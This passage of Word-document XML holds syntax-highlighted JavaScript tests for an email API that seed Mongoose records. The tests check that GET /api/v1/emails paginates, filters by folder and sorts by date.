          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        folderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        uid</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messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`&lt;msg-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@example.com&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        threadId</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'thread-1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`thread-</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`Email de prueba </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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Sender'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`sender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@test.com`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name</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address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'test@example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2026</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bodyText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`Contenido del email número </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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        isRead</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isStarred</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'GET /api/v1/emails lista emails con paginación'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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'GET'</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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`/api/v1/emails?accountId=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;limit=20`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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authToken</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statusCode</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200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(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveLength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">total</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50</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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</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toHaveProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'subject'</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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</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toHaveProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'from'</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'GET /api/v1/emails filtra por folder'</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folderId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId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Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(accountId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      folderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;other-folder-msg@example.com&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      threadId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'other-thread'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Email en otra carpeta'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Sender'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sender@test.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      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bodyText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Contenido'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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'GET'</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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`/api/v1/emails?accountId=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;folderId=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">folderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</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headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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authToken</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statusCode</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200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(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveLength</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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails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subject</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'Email en otra carpeta'</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'GET /api/v1/emails ordena por fecha descendente'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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'GET'</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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`/api/v1/emails?accountId=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;limit=5`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
